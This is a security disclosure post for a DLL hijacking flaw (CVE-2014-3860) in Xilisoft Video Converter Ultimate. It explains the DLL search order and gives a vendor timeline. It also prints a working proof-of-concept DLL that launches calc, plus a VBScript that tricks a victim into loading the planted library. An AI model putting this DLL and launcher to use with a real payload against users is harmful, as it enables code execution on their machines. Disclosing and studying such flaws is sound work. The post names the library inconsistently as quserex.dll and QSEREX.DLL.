Xilisoft Video Converter Ultimate DLL Hijacking

Overview of Xilisoft Video Converter Ultimate

Xilisoft Video Converter Ultimate is a professional video converter which supports a wide range of video and audio formats. I personally love this software since it uses GPU acceleration in converting videos.

It is on the high side of premium video converters for home use. It has automatic profiles enhanced for just any device or format, graphics card detection and acceleration.
- CNET

Arbitrary DLL Injection Code Execution

Xilisoft Video Converter Ultimate is prone to a flaw in the way it dynamically loads the quserex.dll library. Since the library is not specified with a fully qualified path name, the program uses a fixed search path to look for it. This path includes directories that may not be trusted or that are under user control. By placing a custom version of the library in one of those directories, an attacker can make the program load it before the legitimate version. This allows a local attacker to inject custom code that will be run with the privileges of the program or of the user executing the program. This attack can be leveraged remotely in some cases by placing the malicious library on a network share or in an extracted archive downloaded from a remote source. This can be done by tricking a user into running a hostile script from the local file system or a USB drive in some cases. This attack scenario is certainly possible, but rare.


  1. The directory from which the application loaded. = C:\Program Files\Xilisoft\Video Converter Ultimate\QSEREX.DLL
  2. The system directory. = C:\WINDOWS\system32\QSEREX.DLL
  3. The 16-bit system directory. = C:\WINDOWS\system\QSEREX.DLL
  4. The Windows directory. = C:\WINDOWS\QSEREX.DLL
  5. The current directory. = C:\Documents and Settings\Osanda\Desktop\New Folder\QSEREX.DLL

What we can understand is that the application searches for QSEREX.DLL in the current directory, which is a folder named New Folder on the Desktop in this case.
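The lookup order listed above can be modelled to check which DLL names are only satisfied once the search reaches the current directory. This is an added example, not code from the original post: the function names and the file snapshot are constructed for illustration, and the directory paths and DLL name are the ones in the list above.

```python
import ntpath  # Windows path rules, usable on any OS

def search_order(app_dir, windows_dir, cwd):
    """Directories in the order listed on the page (steps 1-5)."""
    return [
        ("application directory", app_dir),
        ("system directory", ntpath.join(windows_dir, "system32")),
        ("16-bit system directory", ntpath.join(windows_dir, "system")),
        ("Windows directory", windows_dir),
        ("current directory", cwd),
    ]

def _norm(path):
    # Windows file names are case-insensitive, so compare normalised forms.
    return ntpath.normcase(ntpath.normpath(path))

def resolve(dll, order, existing_files):
    """Return (label, path) for the first directory that holds dll, else None."""
    present = {_norm(p) for p in existing_files}
    for label, directory in order:
        candidate = ntpath.join(directory, dll)
        if _norm(candidate) in present:
            return label, candidate
    return None

def falls_through_to_cwd(dlls, order, existing_files):
    """DLL names not found in any directory searched before the current one."""
    before_cwd = order[:-1]
    return [d for d in dlls if resolve(d, before_cwd, existing_files) is None]

# Constructed sample: paths from the list above, file snapshot is hypothetical.
APP_DIR = r"C:\Program Files\Xilisoft\Video Converter Ultimate"
CWD = r"C:\Documents and Settings\Osanda\Desktop\New Folder"
ORDER = search_order(APP_DIR, r"C:\WINDOWS", CWD)
SNAPSHOT = [
    r"C:\WINDOWS\system32\kernel32.dll",
    CWD + r"\QSEREX.DLL",
]

if __name__ == "__main__":
    for name in ("kernel32.dll", "qserex.dll"):
        print(name, "->", resolve(name, ORDER, SNAPSHOT))
    print("resolved only via current directory:",
          falls_through_to_cwd(["kernel32.dll", "qserex.dll"], ORDER, SNAPSHOT))
```

Any name this reports is a library the application should be loading by fully qualified path instead.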

Vulnerable Executables:

  • vcloader.exe
  • vc.exe
  • vc_buy.exe

Vulnerability Information

Class: DLL Hijacking [CWE-427]
Impact: System access
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2014-3860

Proof of Concept

[code language="c"]
/*
* Title: Xilisoft Video Converter Ultimate Dll Hijacking Exploit (quserex.dll)
* Version: 7.8.1 build-20140505 (Previous versions might be vulnerable)
* Tested on: Windows XP SP2 en
* Vendor: http://www.xilisoft.com/
* Software Link: http://www.xilisoft.com/webapp/downloader.php?product_code=x-video-converter-ultimate7
* Exploit-Author: Osanda Malith Jayathissa
* /!\ Author is not responsible for any damage you cause
* Use this material for educational purposes only
* Twitter: @OsandaMalith
* CVE: CVE-2014-3860
*/
/*
Vulnerable Executables:
1. vcloader.exe
2. vc.exe
3. vc_buy.exe
*/
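#include <windows.h>
#include <stdlib.h> /* exit() */

/* Payload: launches Calculator to show that code ran, then ends the host process. */
int pwned()
{
    WinExec("calc", 0);
    exit(0);
    return 0;
}

/* Entry point the loader calls when the DLL is mapped into the process. */
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    pwned();
    return 0;
}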
[/code]


Automation

As this application has no file extensions associated with it, we have to manually open a file with this application. We can automate this process by writing something like this 😉 Place the DLL and this script in the same location. Once the victim runs this script, the DLL will be hijacked.

[code language="vb"]
msg=MsgBox ("Automated POC" & chr(13) & "Coded by Osanda Malith", 64, "Xilisoft Video Converter Ultimate Dll Hijacking Exploit")
Set objFileToWrite = CreateObject("Scripting.FileSystemObject").OpenTextFile("new.jpg",2,true)
objFileToWrite.WriteLine("POC by Osanda Malith :D")
objFileToWrite.Close
file = "new.jpg"
Set oShell = CreateObject("WScript.Shell")
' Path to Xilisoft Video Converter
oShell.Run """%ProgramFiles%\Xilisoft\Video Converter Ultimate\vcloader.exe """ & file
[/code]

Disclosure Timeline

2014-04-20 : Contacted the vendor
2014-04-23 : Contacted again as I did not receive any reply
2014-04-24 : Received a response saying that it was forwarded to technicians
2014-05-16 : Contacted again since there was no reply
2014-05-20 : Received a response saying that they cannot reproduce
2014-06-01 : Contacted MITRE
2014-06-02 : Public disclosure
http://packetstormsecurity.com/files/126882/Xilisoft-Video-Converter-Ultimate-7.8.1-build-20140505-DLL-Hijacking.html
